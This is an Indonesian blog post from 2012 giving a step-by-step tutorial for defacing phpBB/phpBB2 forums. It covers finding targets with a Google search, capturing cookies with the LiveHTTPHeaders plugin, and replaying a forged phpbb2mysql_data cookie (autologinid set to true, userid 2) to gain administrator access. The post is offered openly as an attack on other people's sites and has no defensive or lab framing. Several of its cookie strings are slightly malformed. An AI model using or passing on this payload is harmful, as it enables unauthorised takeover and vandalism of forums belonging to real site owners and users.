0

Defacing

Selasa, 06 Maret 2012
Share this Article on :
Langkah-Langkah
Deface PHPBB/PHPBB2
Loser_cs_20
1. Download browser
Mozilla FireFox
2. Download pluginnya
yg bernama
LiveHTTPHeader
download di http://
livehttpheaders.
mozdev.org/
installation.html

cari yg paling baru
3. selanjutnya cari

target dengan Uncle
Google dgn syntax :
phpBB site:[terserah
apa aja]
4. setelah itu buka
plugin yg kita
download tadi di Tools
-> LiveHTTPHeader
5. Ingat, isi
LiveHTTPHeader harus
kosong
6. buka situs target,
dengan begitu
LiveHTTPHeader akan
mengambil semua
cookie yg tercatat di
halaman target
7. setelah halaman
sukses terbuka ditandai
dengan tanda "done" di
bawah browser,
langkah selanjutnya
adalah mengklik
LiveHTTPHeader di
bagian tengahnya
dilanjutkan mengklik
opsi Replay..
8. setelah
LiveHTTPReplay
terbuka liat bagian
seperti dibawah ini
pada LiveHTTPReplay...
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
9. Hapus bagian yg
belakang setelah tanda
semi colon (
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
\_______________hapus
bagian
ini_________________/
jadinya akan seperti ini :
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
10. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
11. selanjutnya
perhatikan langkah di
bawah ini:
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
\________hapus bagian
ini dan di ganti dengan:
Cookie:
phpbb2mysql_data=a:2
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
12. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
13. perhatikan lagi
langkah ini:
Cookie:
phpbb2mysql_data=a:2:
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
\__________________________
_bagian ini jg digantilagi
_______________
________________/
menjadi seperti ini:
Cookie:
phpbb2mysql_data=a
%3A2%3A%7Bs
%3A11%3A
%22autologinid
%22%3Bb%3A1%3Bs
%3A6%3A%22userid
%22%3Bs%3A1%3A
%222%22%3B%7D
14. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
15. selesai, silakan liat
halaman target, kalo
anda beruntung anda
mendapatkan full
admin.
Silakan pergi ke bawah
halaman dan lihat opsi
"Go To Administration
Panel" telah muncul


Artikel Terkait:

0 komentar:

Posting Komentar